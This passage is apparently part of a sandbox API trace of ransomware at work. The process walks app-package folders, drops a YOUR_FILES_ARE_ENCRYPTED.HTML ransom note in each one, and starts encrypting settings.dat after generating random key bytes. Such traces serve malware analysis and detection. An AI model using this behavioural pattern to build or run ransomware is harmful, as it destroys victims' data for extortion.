lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 0 [0121.751] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.751] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0121.751] GetProcessHeap () returned 0x600000 [0121.751] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.752] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.762] CloseHandle (hObject=0x31c) returned 1 [0121.762] GetProcessHeap () returned 0x600000 [0121.762] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.762] GetProcessHeap () returned 0x600000 [0121.762] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.763] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0121.763] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.763] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache") returned 94 [0121.763] GetProcessHeap () returned 0x600000 [0121.763] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.764] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache" [0121.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\*" [0121.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.764] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 1 [0121.764] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 0 [0121.764] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.764] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0121.764] GetProcessHeap () returned 0x600000 [0121.765] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.766] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.767] CloseHandle (hObject=0x31c) returned 1 [0121.767] GetProcessHeap () returned 0x600000 [0121.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.767] GetProcessHeap () returned 0x600000 [0121.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.768] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0121.768] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.768] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState") returned 94 [0121.768] GetProcessHeap () returned 0x600000 [0121.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.769] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState" [0121.769] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\*" [0121.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.769] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 1 [0121.769] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 0 [0121.769] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.769] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0121.769] GetProcessHeap () returned 0x600000 [0121.769] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.770] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.771] CloseHandle (hObject=0x31c) returned 1 [0121.771] GetProcessHeap () returned 0x600000 [0121.771] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.771] GetProcessHeap () returned 0x600000 [0121.771] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.771] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0121.771] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.771] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState") returned 96 [0121.771] GetProcessHeap () returned 0x600000 [0121.771] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.771] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState" [0121.771] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\*" [0121.771] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0121.772] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 1 [0121.772] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 0 [0121.772] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0121.772] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0121.772] GetProcessHeap () returned 0x600000 [0121.772] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.772] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.773] CloseHandle (hObject=0x31c) returned 1 [0121.773] GetProcessHeap () returned 0x600000 [0121.773] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.773] GetProcessHeap () returned 0x600000 [0121.773] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.774] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.774] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.774] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings") returned 92 [0121.774] GetProcessHeap () returned 0x600000 [0121.774] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.774] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings" [0121.774] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\*" [0121.774] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x94e232ee, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.775] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x94e232ee, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 1 [0121.775] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0121.775] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.775] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\roaming.lock") returned 105 [0121.775] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.775] lstrlenW (lpString=".lock") returned 5 [0121.775] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.775] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x94f7a65b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94f7a65b, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0121.775] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.775] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat") returned 105 [0121.775] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.775] lstrlenW (lpString=".dat") returned 4 [0121.775] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.775] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0121.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0121.776] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0121.776] GetProcessHeap () returned 0x600000 [0121.776] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.778] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="80") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="FB") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="AC") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="A4") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="C3") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="12") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="11") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="BA") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="32") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="53") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="1A") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="12") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="50") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="64") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="70") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="FB") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="BC") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F1") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="49") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="50") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="E6") returned 2 [0121.778] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="A0") returned 